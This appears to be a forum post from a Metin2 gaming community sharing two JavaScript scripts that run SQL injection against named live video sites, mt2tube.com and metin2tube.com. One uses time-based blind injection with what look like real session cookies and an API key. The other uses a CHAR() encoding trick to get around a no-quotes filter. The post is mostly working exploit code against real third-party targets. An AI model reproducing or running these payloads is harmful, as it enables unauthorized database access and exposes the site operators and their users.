Bitte melden Sie sich an, um dieses Bild zu sehen.
Bitte melden Sie sich an, um dieses Bild zu sehen.
Ah shit, ...
For Bitte melden Sie sich an, um diesen Link zu sehen., you can test the injection like this:
JavaScript
- const axios = require('axios');
- const queryString = require('query-string');
- const url = queryString.stringifyUrl({
- url: 'https://www.mt2tube.com/api/v1.0',
- query: {
- type: 'popular_channels',
- },
- });
- const axiosInstance = axios.create({
- headers: {
- Cookie: stringifyCookie({
- PHPSESSID: 'vf34e0d5n066te1tbfv05jjuli',
- user_id: '5340ceee6bc3327b18a4a307b7699accbcd86f8315914037003f6f1a1a5dfc731283fe7ae488f93687',
- }),
- },
- });
- /**
- *
- * @param {{ [cooke: string]: string; }} cookies
- */
- function stringifyCookie(cookies) {
- cookies = Object.keys(cookies)
- .map((cookie) => `${cookie}=${cookies[cookie]}`)
- .join('; ');
- return cookies;
- }
- /**
- *
- * @param {string} sql
- * @param {number} sleep
- */
- function exec(sql, sleep = 0) {
- return axiosInstance
- .post(
- url,
- queryString.stringify({
- server_key: '1312a113c58715637a94437389326a49',
- last_count: 1,
- channels_ids: `0) AND (SELECT(${sql}) OR 1) AND SLEEP(${sleep}`,
- })
- )
- .then((response) => response.status === 200)
- .catch(() => false)
- }
- exec('SELECT views FROM videos WHERE views > 999 OR SLEEP(10) LIMIT 1')
- .then(result => console.log(result ? 'Completed.' : 'Failed.'));
Btw, a long time ago I found a code / SQL injection at Metin2Tube. I told the admin to fix it. He fixed it and I told him to check the page against security issues. Unfortunately that hasn't happened to this day, lul 
So for Bitte melden Sie sich an, um diesen Link zu sehen., you can test the injection like this:
JavaScript
- const axios = require('axios');
- const queryString = require('query-string');
- /**
- * No quotes are allowed.
- */
- function prepareSql(sql) {
- return sql.replace(/'((?:[^\\]|\\.)*?)'|"((?:[^\\]|\\.)*?)"/gsi, (m, p1, p2) => `CHAR(${Array.from(p1 || p2).map(c => c.charCodeAt(0)).join(', ')})`);
- }
- function exec(sql) {
- console.log(`sql: '${sql}'`);
- sql = prepareSql(sql);
- const url = queryString.stringifyUrl({
- url: 'https://metin2tube.com/api/relatedvids',
- query: {
- videoowner: '',
- videomedia: 1,
- videocategory: 1,
- videoid: `1) AND (SELECT (${sql})`
- }
- });
- return axios.get(url).then(() => true).catch(() => false)
- }
- exec(`SELECT '\\'';`).then(() => console.log('Completed.'));
